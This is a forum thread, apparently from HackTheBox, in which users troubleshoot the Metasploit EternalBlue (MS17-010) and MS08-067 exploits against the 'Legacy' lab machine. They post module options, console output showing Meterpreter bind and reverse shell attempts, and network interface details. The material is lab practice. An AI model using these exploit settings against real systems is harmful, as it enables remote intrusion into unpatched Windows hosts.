Legacy Machine not receiving response from exploit packet

Hey,

I’m getting into HackTheBox and having abnormally hard time with this box as the exploit (ms17_010_ethernalblue) isn’t recieving a response back from the exploit.

I’ve tried on the parrot box from HTB and doesn’t seem to come back…

I’ve looked into this form but nothing helped when trying these methods.

Options:

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description


RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/bind_tcp):

Name Current Setting Required Description


EXITFUNC thread yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.10.10.4 no The target address

Exploit target:

Id Name


0 Windows 7 and Server 2008 R2 (x64) All Service Packs

Results:

[] 10.10.10.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[
] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[] 10.10.10.4:445 - Connecting to target for exploitation.
[+] 10.10.10.4:445 - Connection established for exploitation.
[+] 10.10.10.4:445 - Target OS selected valid for OS indicated by SMB reply
[
] 10.10.10.4:445 - CORE raw buffer dump (11 bytes)
[] 10.10.10.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 10.10.10.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[
] 10.10.10.4:445 - Trying exploit with 12 Groom Allocations.
[] 10.10.10.4:445 - Sending all but last fragment of exploit packet
[
] 10.10.10.4:445 - Starting non-paged pool grooming
[+] 10.10.10.4:445 - Sending SMBv2 buffers
[+] 10.10.10.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 10.10.10.4:445 - Sending final SMBv2 buffers.
[
] 10.10.10.4:445 - Sending last fragment of exploit packet!
[] 10.10.10.4:445 - Receiving response from exploit packet
[-] 10.10.10.4:445 - Did not receive a response from exploit packet
[
] 10.10.10.4:445 - Sending egg to corrupted connection.
[-] 10.10.10.4:445 - Errno::ECONNRESET: Connection reset by peer
[] Started bind TCP handler against 10.10.10.4:4444
[
] Exploit completed, but no session was created.

Interfaces:

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 46:2e:41:c8:dc:71 brd ff:ff:ff:ff:ff:ff
inet 159.65.222.18/21 brd 159.65.223.255 scope global eth0
valid_lft forever preferred_lft forever
inet 10.10.0.20/16 brd 10.10.255.255 scope global eth0:1
valid_lft forever preferred_lft forever
inet6 fe80::442e:41ff:fec8:dc71/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether be:d2:de:34:36:8e brd ff:ff:ff:ff:ff:ff
inet 10.116.0.16/20 brd 10.116.15.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::bcd2:deff:fe34:368e/64 scope link
valid_lft forever preferred_lft forever
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 100
link/none
inet 10.10.14.7/23 brd 10.10.15.255 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::1005/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::b85b:e82c:aa0a:6622/64 scope link stable-privacy
valid_lft forever preferred_lft forever
6: teredo: <POINTOPOINT,MULTICAST,NOARP> mtu 1500 qdisc noop state DOWN group default qlen 500
link/none

Alright, noob move everyone…

I’ve believed I actually used the wrong interface when executing these exploits in MSFConsole.

If anyone else has this problem, just set your LHOST field to an internal IP range (10.X.X.X) to the Legacy box which makes it reachable to create a Meterpreter shell.

Ensure your using your tunnel IP address:

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.7 netmask 255.255.254.0 destination 10.10.14.7
inet6 fe80::b85b:e82c:aa0a:6622 prefixlen 64 scopeid 0x20
inet6 dead:beef:2::1005 prefixlen 64 scopeid 0x0
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 2880 bytes 359942 (351.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5654 bytes 1495091 (1.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

set that as your LHOST and send your exploit.

Hi,

Does anyone else have the following issue with the “Legacy” machine?

It seemingly just hangs forever on “Sending stage (175174 bytes) to 10.10.10.4”, see full output below.

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.23:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4

I have tried resetting the machine, using a different HTB VPN connection and running the exploit manually, all to no avail.

I have also noitced that the vulnerable SMB service seems to go up and down on the machine, as well as NMAP scans sometimes needing to be run with the -Pn flag. Not sure if is linked to the issue?